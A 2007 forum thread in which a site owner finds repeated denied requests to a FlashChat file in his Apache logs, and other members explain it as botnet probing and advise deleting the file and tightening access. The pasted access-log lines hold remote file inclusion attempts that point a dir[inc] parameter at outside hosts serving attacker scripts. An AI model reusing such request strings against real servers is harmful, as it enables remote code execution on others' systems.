Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - Other
Author Message
hinksta
Worker
Worker


Joined: Dec 23, 2005
Posts: 226
Location: UK

PostPosted: Fri Jan 19, 2007 9:34 am Reply with quote

Installed flashchat integrated with nuke a couple of days ago and today noticed this in my Error Log.
Is this some kind of an attack or a setting I haven't found yet?

Code:
[Fri Jan 19 10:16:45 2007] [error] [client 69.65.99.242] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php

[Fri Jan 19 10:12:10 2007] [error] [client 72.232.54.82] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 10:11:43 2007] [error] [client 64.8.124.64] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 10:10:32 2007] [error] [client 204.157.37.155] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 10:10:25 2007] [error] [client 200.32.5.111] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 10:09:40 2007] [error] [client 209.160.32.45] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 10:09:00 2007] [error] [client 204.157.37.155] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 10:07:35 2007] [error] [client 204.157.37.155] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 10:06:48 2007] [error] [client 84.234.70.80] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 10:06:15 2007] [error] [client 69.65.99.128] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 10:06:12 2007] [error] [client 204.157.37.155] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:33:35 2007] [error] [client 69.93.43.2] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:32:52 2007] [error] [client 82.223.148.108] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:29:18 2007] [error] [client 72.18.159.5] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:19:55 2007] [error] [client 80.86.83.167] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:15:05 2007] [error] [client 69.13.39.114] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:11:27 2007] [error] [client 204.157.37.155] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:11:09 2007] [error] [client 64.8.124.64] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:11:02 2007] [error] [client 62.105.76.164] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:10:47 2007] [error] [client 69.65.99.242] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:10:40 2007] [error] [client 72.232.54.82] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:10:17 2007] [error] [client 204.157.37.155] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:10:10 2007] [error] [client 202.8.85.46] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:09:57 2007] [error] [client 64.8.124.64] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:09:34 2007] [error] [client 200.32.5.111] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:09:34 2007] [error] [client 194.50.163.175] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:09:15 2007] [error] [client 209.160.32.45] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:08:45 2007] [error] [client 72.232.54.82] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:08:38 2007] [error] [client 64.8.124.64] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:08:26 2007] [error] [client 204.157.37.155] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:07:31 2007] [error] [client 202.8.85.46] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:07:16 2007] [error] [client 84.234.70.80] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:07:15 2007] [error] [client 64.8.124.64] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:07:14 2007] [error] [client 84.18.207.64] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:07:10 2007] [error] [client 204.157.37.155] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:07:07 2007] [error] [client 69.65.99.128] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 09:04:08 2007] [error] [client 80.86.83.167] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 08:25:07 2007] [error] [client 195.214.44.149] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:51:59 2007] [error] [client 132.230.123.9] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:50:46 2007] [error] [client 195.214.44.149] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:37:28 2007] [error] [client 66.128.49.67] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:34:52 2007] [error] [client 69.13.39.114] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:32:22 2007] [error] [client 200.32.5.111] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:30:55 2007] [error] [client 72.232.54.82] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:30:36 2007] [error] [client 66.36.233.82] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:29:52 2007] [error] [client 64.8.124.64] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:29:39 2007] [error] [client 69.65.99.128] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:29:33 2007] [error] [client 202.8.85.46] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:29:17 2007] [error] [client 204.157.37.155] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:29:16 2007] [error] [client 84.234.70.80] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:29:15 2007] [error] [client 212.34.140.170] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:29:09 2007] [error] [client 69.65.99.242] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:28:55 2007] [error] [client 64.8.124.64] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:28:49 2007] [error] [client 72.232.54.82] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:28:07 2007] [error] [client 66.36.233.82] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:28:01 2007] [error] [client 64.8.124.64] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:27:49 2007] [error] [client 204.157.37.155] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:27:48 2007] [error] [client 200.32.5.111] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:26:56 2007] [error] [client 204.157.37.155] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:26:49 2007] [error] [client 64.8.124.64] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:26:48 2007] [error] [client 66.36.233.82] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:26:45 2007] [error] [client 69.65.99.242] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:26:21 2007] [error] [client 209.160.32.45] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:25:58 2007] [error] [client 204.157.37.155] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:25:40 2007] [error] [client 64.8.124.64] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 07:25:32 2007] [error] [client 148.243.232.98] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 06:56:41 2007] [error] [client 66.128.49.67] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 06:56:05 2007] [error] [client 195.214.44.149] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 06:15:37 2007] [error] [client 72.36.230.106] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
[Fri Jan 19 06:15:07 2007] [error] [client 64.8.124.64] client denied by server configuration: /myserver/chat/inc/cmses/aedatingCMS.php
 
View user's profile Send private message Visit poster's website
hitwalker
Sells PC To Pay For Divorce


Joined:
Posts: 5661

PostPosted: Fri Jan 19, 2007 10:02 am Reply with quote

well i know the stuff and own must of it but you might wanna remove it cause every time hackers find a weak point somewhere.

read also here... Only registered users can see links on this board! Get registered or login!

continue using it at your own risk.
 
View user's profile Send private message
hinksta
PostPosted: Fri Jan 19, 2007 10:11 am Reply with quote

lol your brother flame knows a thing or two about this

I've removed all but one of the cms files and added the htaccess

I'll have to keep an eye on this one.
 
hinksta
PostPosted: Fri Jan 19, 2007 11:08 am Reply with quote

I'm guessing it's got something to do with these people, there may be more in tomorrows log.
Code:
80.237.132.50 - - [18/Jan/2007:17:29:37 -0500] "GET /chat/inc/cmses/aedatingCMS.php?dir[inc]=http://sese.by.ru/c.gif? HTTP/1.1" 403 1674 "-" "libww

217.115.84.178 - - [18/Jan/2007:23:57:10 -0500] "GET /chat/inc/cmses/aedatingCMS.php?dir[inc]=http://stx.yoll.net/vrw.txt? HTTP/1.1" 403 1679 "-" "libww
89.108.86.110 - - [19/Jan/2007:00:01:18 -0500] "GET /chat/inc/cmses/aedatingCMS.php?dir[inc]=http://stx.yoll.net/vrw.txt? HTTP/1.1" 403 1678 "-" "libww
 
hitwalker
PostPosted: Fri Jan 19, 2007 1:41 pm Reply with quote

yeah to bad that stuff isnt to be trusted fully yet....
but a friend of mine used one of the latest versions and his old host warned him mails were send out by the hundreds abusing the chat scripts.
 
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Fri Jan 19, 2007 2:23 pm Reply with quote

That is just a botnet, trying to exploit things on your server. If you do not have that file, you do not need to worry.

However, you should be worried if you are using any vulnerable scripts. Old versions of phpNuke, phpBB, vWar, SQuery... etc etc etc

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
hitwalker
PostPosted: Fri Jan 19, 2007 2:35 pm Reply with quote

but he does have that file....,i mean it comes standard.
but i think it can be deleted as it is not required when using for nuke.
 
hinksta
PostPosted: Fri Jan 19, 2007 2:40 pm Reply with quote

yeah i've deleted it and the htaccess was already sorted, it must have been an update in this last version
 
hitwalker
PostPosted: Fri Jan 19, 2007 2:41 pm Reply with quote

well if its only for nuke you can delete every non nuke related file...
also secure any admin area if possible....
and keep an eye on its traffic.....
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - Other

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©